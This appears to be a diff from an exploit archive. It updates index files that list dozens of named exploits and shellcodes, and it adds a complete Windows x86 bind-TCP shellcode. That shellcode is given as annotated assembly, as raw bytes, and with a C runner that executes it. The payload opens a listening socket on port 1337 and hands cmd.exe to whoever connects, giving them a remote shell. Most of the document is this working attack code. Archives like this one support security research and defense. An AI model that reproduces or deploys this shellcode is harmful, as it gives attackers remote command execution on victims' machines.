50332,exploits/windows/local/50332.py,"Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH)",1970-01-01,stresser,local,windows, 50332,exploits/windows/local/50332.py,"Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH)",1970-01-01,stresser,local,windows,
50336,exploits/windows/local/50336.py,"Cyberfox Web Browser 52.9.1 - Denial-of-Service (PoC)",1970-01-01,"Aryan Chehreghani",local,windows, 50336,exploits/windows/local/50336.py,"Cyberfox Web Browser 52.9.1 - Denial-of-Service (PoC)",1970-01-01,"Aryan Chehreghani",local,windows,
50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows, 50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows,
50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",1970-01-01,"Kiran Ghimire",local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -44495,4 +44496,9 @@ id,file,description,date,author,type,platform,port
50380,exploits/multiple/webapps/50380.txt,"Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read",1970-01-01,"Mayank Deshmukh",webapps,multiple, 50380,exploits/multiple/webapps/50380.txt,"Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read",1970-01-01,"Mayank Deshmukh",webapps,multiple,
50381,exploits/multiple/webapps/50381.txt,"Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection",1970-01-01,"Emel Basayar",webapps,multiple, 50381,exploits/multiple/webapps/50381.txt,"Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection",1970-01-01,"Emel Basayar",webapps,multiple,
50382,exploits/php/webapps/50382.py,"Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure",1970-01-01,"Ron Jost",webapps,php, 50382,exploits/php/webapps/50382.py,"Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure",1970-01-01,"Ron Jost",webapps,php,
50383,exploits/multiple/webapps/50383.sh,"Apache HTTP Server 2.4.49 - Path Traversal",1970-01-01,"Lucas Souza",webapps,multiple, 50383,exploits/multiple/webapps/50383.sh,"Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)",1970-01-01,"Lucas Souza",webapps,multiple,
50386,exploits/php/webapps/50386.txt,"Online DJ Booking Management System 1.0 - 'Multiple' Blind Cross-Site Scripting",1970-01-01,"Yash Mahajan",webapps,php,
50387,exploits/php/webapps/50387.txt,"Online Traffic Offense Management System 1.0 - Multiple SQL Injection (Unauthenticated)",1970-01-01,snup,webapps,php,
50388,exploits/php/webapps/50388.txt,"Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated)",1970-01-01,snup,webapps,php,
50389,exploits/php/webapps/50389.txt,"Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated)",1970-01-01,snup,webapps,php,
50390,exploits/php/webapps/50390.txt,"Simple Online College Entrance Exam System 1.0 - SQLi Authentication Bypass",1970-01-01,"Mevlüt Yılmaz",webapps,php,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -1043,3 +1043,4 @@ id,file,description,date,author,type,platform
50141,shellcodes/linux_x86/50141.c,"Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode",1970-01-01,d7x,shellcode,linux_x86 50141,shellcodes/linux_x86/50141.c,"Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode",1970-01-01,d7x,shellcode,linux_x86
50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64 50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64
50368,shellcodes/windows_x86/50368.c,"Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86 50368,shellcodes/windows_x86/50368.c,"Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86
50384,shellcodes/windows_x86/50384.c,"Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86

1 id file description date author type platform
1043 50141 shellcodes/linux_x86/50141.c Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode 1970-01-01 d7x shellcode linux_x86
1044 50291 shellcodes/windows_x86-64/50291.c Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes) 1970-01-01 Xenofon Vassilakopoulos shellcode windows_x86-64
1045 50368 shellcodes/windows_x86/50368.c Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes) 1970-01-01 Daniel Ortiz shellcode windows_x86
1046 50384 shellcodes/windows_x86/50384.c Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes) 1970-01-01 Daniel Ortiz shellcode windows_x86

324
shellcodes/windows_x86/50384.c Normal file
View file

@ -0,0 +1,324 @@
; Name: Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)
; Author: h4pp1n3ss
; Date: Wed 10/06/2021
; Tested on: Microsoft Windows [Version 10.0.19042.1237]
; Description:
; This a bind tcp shellcode that open a listen socket on 0.0.0.0 and port 1337. In order to accomplish this task the shellcode uses
; the PEB method to locate the baseAddress of the required module and the Export Directory Table to locate symbols.
; Also the shellcode uses a hash function to gather dynamically the required symbols without worry about the length.
start: ;
mov ebp, esp ;
add esp, 0xfffff9f0 ; Avoid null-bytes and stack clobbering
find_kernel32:
xor ecx, ecx ; ECX = Null
mov esi,fs:[ecx+0x30] ; ESI = &(PEB) ([FS:0x30])
mov esi,[esi+0x0C] ; ESI = PEB->Ldr
mov esi,[esi+0x1C] ; ESI = PEB->Ldr.InInitOrder
next_module: ;
mov ebx, [esi+0x08] ; EBX = InInitOrder[X].base_address
mov edi, [esi+0x20] ; EDI = InInitOrder[X].module_name
mov esi, [esi] ; ESI = InInitOrder[X].flink (next module)
cmp [edi+12*2], cx ; (unicode) module_name[12] == 0x00 / we found kernel32.dll?
jne next_module ; No: try next module
find_function_shorten: ;
jmp find_function_shorten_bnc ; short jump
find_function_ret: ;
pop esi ; ESI = POP return addres
mov [ebp+0x04], esi ; Save find_function address for later usage
jmp resolve_symbols_kernel32 ;
find_function_shorten_bnc: ;
call find_function_ret ; Call fund_function_ret PUSH ret address into the stack
find_function: ;
pushad ; Save all registers
mov eax, [ebx+0x3c] ; Offset of PE signature
mov edi, [ebx+eax+0x78] ; Export Table Directory RVA
add edi, ebx ; Export Table Directory VMA
mov ecx, [edi+0x18] ; NumberOfNames
mov eax, [edi+0x20] ; AddressOfNames RVA
add eax, ebx ; AddresOfNames VMA
mov [ebp-4], eax ; Save AddressOfName VMA for later usage
find_function_loop: ;
jecxz find_function_finished ; Jump to the end if ECX is 0
dec ecx ; Decrement our counter
mov eax, [ebp-4] ; Restore AddressOfNames VMA
mov esi, [eax+ecx*4] ; Get the RVA of the symbol name
add esi, ebx ; Set ESI to the VMA of the current symbol name
compute_hash: ;
xor eax, eax ; EAX = Null
cdq ; Null EDX
cld ; Clear direction flag
compute_hash_again:
lodsb ; Load the next bytes from ESI into al
test al, al ; Check for Null terminator
jz compute_hash_finished ; If the ZF is set, we've hit the NULL term
ror edx, 0x0d ; Rotate edx 13 bits to the right
add edx, eax ; Add the new byte to the accumulator
jmp compute_hash_again ; Next iteration
compute_hash_finished: ;
find_function_compare:
cmp edx, [esp+0x24] ; Compare the computed hash with the requested hash
jnz find_function_loop ; If it doesn't match go back to find_function_loop
mov edx, [edi+0x24] ; AddressOfNameOrdinals RVA
add edx, ebx ; AddressOfNameOrdinals VMA
mov cx, [edx+2*ecx] ; Extrapolate the function's ordinal
mov edx, [edi+0x1c] ; AddressOfFunctions RVA
add edx, ebx ; AddressOfFunctions VMA
mov eax, [edx+4*ecx] ; Get the function RVA
add eax, ebx ; Get the function VMA
mov [esp+0x1c], eax ; Overwrite stack version of eax from pushad
find_function_finished: ;
popad ; Restore registers
ret ;
resolve_symbols_kernel32: ;
push 0x78b5b983 ; TerminateProcess hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x10], eax ; Save TerminateProcess address for later usage
push 0xec0e4e8e ; LoadLibraryA hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x14], eax ; Save LoadLibraryA address for later usage
push 0x16b3fe72 ; CreateProcessA hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x18], eax ; Save CreateProcessA address for later usage
load_ws2_32: ;
xor eax, eax ; EAX = Null
mov ax, 0x6c6c ; EAX = 0x6c6c
push eax ; ESP = "ll"
push dword 0x642e3233 ; ESP = "32.dll"
push dword 0x5f327377 ; ESP = "ws2_32.dll"
push esp ; ESP = &("ws2_32.dll")
call dword [ebp+0x14] ; Call LoadLibraryA
resolve_symbols_ws2_32:
mov ebx, eax ; Move the base address of ws2_32.dll to EBX
push 0x3bfcedcb ; WSAStartup hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x1C], eax ; Save WSAStartup address for later usage
push 0xadf509d9 ; WSASocketA hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x20], eax ; Save WSASocketA address for later usage
push 0xc7701aa4 ; Bind hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x24], eax ; Save Bind address for later usage
push 0xe92eada4 ; listen hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x28], eax ; Save listen address for later usage
push 0x9f5b7976 ; WSAGetLastError hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x32], eax ; Save WSAGetLastError address for later usage
push 0x498649e5 ; accept hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x36], eax ; Save acccept address for later usage
call_wsastartup: ;
mov eax, esp ; Move ESP to EAX
mov cx, 0x590 ; Move 0x590 to CX
sub eax, ecx ; Substract CX from EAX to avoid overwriting the structure later
push eax ; Push lpWSAData
xor eax, eax ; EAX = Null
mov ax, 0x0202 ; Move version to AX
push eax ; Push wVersionRequired (0x00000202)
call dword [ebp+0x1C] ; Call WSAStartup(WORD wVersionRequired, LPWSADATA lpWSAData)
call_wsasocketa: ; WSASocketA(AF_INET = 2, SOCK_STREAM = 1, TCP = 6, NULL, NULL, NULL )
xor eax, eax ; EAX = Null
push eax ; Push dwFlags
push eax ; Push g
push eax ; Push lpProtocolInfo
mov al, 0x06 ; Move AL, IPPROTO_TCP
push eax ; Push protocol
sub al, 0x05 ; Substract 0x05 from AL, AL = 0x01
push eax ; Push type
inc eax ; Increase EAX, EAX = 0x02
push eax ; Push af
call dword [ebp+0x20] ; Call WSASocketA(2,1,6,0,0,0)
create_sockaddr_in_struct: ; sockaddr_in {AF_INET = 2; p1337 = 0x3905; INADDR_ANY = 0x5D00A8C0}
mov esi, eax ; Move the SOCKET descriptor to ESI
xor eax, eax ; EAX = Null
push eax ; Push sin_addr (any address 0.0.0.0)
mov ax, 0x3905 ; Move the sin_port (example: 1337) to AX (EAX = 0x00003905)
shl eax, 0x10 ; Left shift EAX by 0x10 bytes (EAX = 0x39050000)
add ax, 0x02 ; Add 0x02 (AF_INET) to AX
push eax ; Push sin_port & sin_family
push esp ; Push pointer to the sockaddr_in structure
pop edi ; EDI = &(sockaddr_in)
call_bind: ; bind(SOCKET *s = ESI, const sockaddr *addr = EDI, int namelen = 0x16)
xor eax, eax ; EAX = Null
add al, 0x16 ; Set AL to 0x16
push eax ; Push namelen
push edi ; Push *addr
push esi ; Push s
call dword [ebp+0x24] ; Call bind
call_wsagetlaserror: ; WSAGetLastError() (just for debugging purpouse)
call dword [ebp+0x32] ; Call WSAGetLastError
call_listen: ;
xor eax, eax ; EAX = Null
push eax ; Push backlog
push esi ; Push s
call dword [ebp+0x28] ; Call WS2_32!listen
call_accept: ; accept( SOCKET s, sockaddr *addr, int *addrlen)
xor eax, eax ; EAX = Null
push eax ; Push *addrlen (optional)
push eax ; Push *addr (optional)
push esi ; Push socket HANDLE from WSASocketA()
call dword [ebp+0x36] ; Call accept(SOCKET s ,Null, Null)
create_startupinfoa: ;
mov esi, eax ; Save Handle returned from accept() into ESI
push esi ; Push hStdError
push esi ; Push hStdOutput
push esi ; Push hStdInput
xor eax, eax ; EAX = Null
push eax ; Push lpReserved2
push eax ; Push cbReserved2 & wShowWindow
mov al, 0x80 ; Move 0x80 to AL
xor ecx, ecx ; EAX = Null
mov cl, 0x80 ; Move 0x80 to CL
add eax, ecx ; Set EAX to 0x100
push eax ; Push dwFlags
xor eax, eax ; EAX = Null
push eax ; Push dwFillAttribute
push eax ; Push dwYCountChars
push eax ; Push dwXCountChars
push eax ; Push dwYSize
push eax ; Push dwXSize
push eax ; Push dwY
push eax ; Push dwX
push eax ; Push lpTitle
push eax ; Push lpDesktop
push eax ; Push lpReserved
mov al, 0x44 ; Move 0x44 to AL
push eax ; Push cb
push esp ; Push pointer to the STARTUPINFOA structure
pop edi ; Store pointer to STARTUPINFOA in EDI
create_cmd_string: ;
mov eax, 0xff9a879b ; Move 0xff9a879b into EAX
neg eax ; Negate EAX, EAX = 00657865
push eax ; Push part of the "cmd.exe" string
push 0x2e646d63 ; Push the remainder of the "cmd.exe" string
push esp ; Push pointer to the "cmd.exe" string
pop ebx ; Store pointer to the "cmd.exe" string in EBX
call_createprocessa: ;
mov eax, esp ; Move ESP to EAX
xor ecx, ecx ; ECX = Null
mov cx, 0x390 ; Move 0x390 to CX
sub eax, ecx ; Substract CX from EAX to avoid overwriting the structure later
push eax ; Push lpProcessInformation
push edi ; Push lpStartupInfo
xor eax, eax ; EAX = Null
push eax ; Push lpCurrentDirectory
push eax ; Push lpEnvironment
push eax ; Push dwCreationFlags
inc eax ; Increase EAX, EAX = 0x01 (TRUE)
push eax ; Push bInheritHandles
dec eax ; EAX = Null
push eax ; Push lpThreadAttributes
push eax ; Push lpProcessAttributes
push ebx ; Push lpCommandLine
push eax ; Push lpApplicationName
call dword [ebp+0x18] ; Call CreateProcessA
call_terminate_process: ;
xor eax, eax ; EAX = Null
push eax ; uExitCode
push 0xffffffff ; HANDLE hProcess
call dword [ebp+0x04] ; Call TerminateProcess
[*]================================= POC =============================== [*]
/*
Shellcode runner author: reenz0h (twitter: @sektor7net)
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// nasm -f win32 shellcode.asm -o shellcode.o
// objdump -D ./shellcode.o |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
unsigned char payload[] =
"\x89\xe5\x81\xc4\xf0\xf9\xff\xff\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b"
"\x76\x1c\x8b\x5e\x08\x8b\x7e\x20\x8b\x36\x66\x39\x4f\x18\x75\xf2\xeb\x06"
"\x5e\x89\x75\x04\xeb\x54\xe8\xf5\xff\xff\xff\x60\x8b\x43\x3c\x8b\x7c\x03"
"\x78\x01\xdf\x8b\x4f\x18\x8b\x47\x20\x01\xd8\x89\x45\xfc\xe3\x36\x49\x8b"
"\x45\xfc\x8b\x34\x88\x01\xde\x31\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca"
"\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x24\x75\xdf\x8b\x57\x24\x01\xda\x66\x8b"
"\x0c\x4a\x8b\x57\x1c\x01\xda\x8b\x04\x8a\x01\xd8\x89\x44\x24\x1c\x61\xc3"
"\x68\x83\xb9\xb5\x78\xff\x55\x04\x89\x45\x10\x68\x8e\x4e\x0e\xec\xff\x55"
"\x04\x89\x45\x14\x68\x72\xfe\xb3\x16\xff\x55\x04\x89\x45\x18\x31\xc0\x66"
"\xb8\x6c\x6c\x50\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\x55\x14"
"\x89\xc3\x68\xcb\xed\xfc\x3b\xff\x55\x04\x89\x45\x1c\x68\xd9\x09\xf5\xad"
"\xff\x55\x04\x89\x45\x20\x68\xa4\x1a\x70\xc7\xff\x55\x04\x89\x45\x24\x68"
"\xa4\xad\x2e\xe9\xff\x55\x04\x89\x45\x28\x68\x76\x79\x5b\x9f\xff\x55\x04"
"\x89\x45\x32\x68\xe5\x49\x86\x49\xff\x55\x04\x89\x45\x36\x89\xe0\x66\xb9"
"\x90\x05\x29\xc8\x50\x31\xc0\x66\xb8\x02\x02\x50\xff\x55\x1c\x31\xc0\x50"
"\x50\x50\xb0\x06\x50\x2c\x05\x50\x40\x50\xff\x55\x20\x89\xc6\x31\xc0\x50"
"\x66\xb8\x05\x39\xc1\xe0\x10\x66\x83\xc0\x02\x50\x54\x5f\x31\xc0\x04\x16"
"\x50\x57\x56\xff\x55\x24\xff\x55\x32\x31\xc0\x50\x56\xff\x55\x28\x31\xc0"
"\x50\x50\x56\xff\x55\x36\x89\xc6\x56\x56\x56\x31\xc0\x50\x50\xb0\x80\x31"
"\xc9\xb1\x80\x01\xc8\x50\x31\xc0\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50"
"\xb0\x44\x50\x54\x5f\xb8\x9b\x87\x9a\xff\xf7\xd8\x50\x68\x63\x6d\x64\x2e"
"\x54\x5b\x89\xe0\x31\xc9\x66\xb9\x90\x03\x29\xc8\x50\x57\x31\xc0\x50\x50"
"\x50\x40\x50\x48\x50\x50\x53\x50\xff\x55\x18\x31\xc0\x50\x6a\xff\xff\x55"
"\x04";
unsigned int payload_len = 415;
int main(void) {
void * exec_mem;
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
RtlMoveMemory(exec_mem, payload, payload_len);
rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
printf("Shellcode Length: %d\n", strlen(payload));
if ( rv != 0 ) {
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
WaitForSingleObject(th, -1);
}
return 0;
}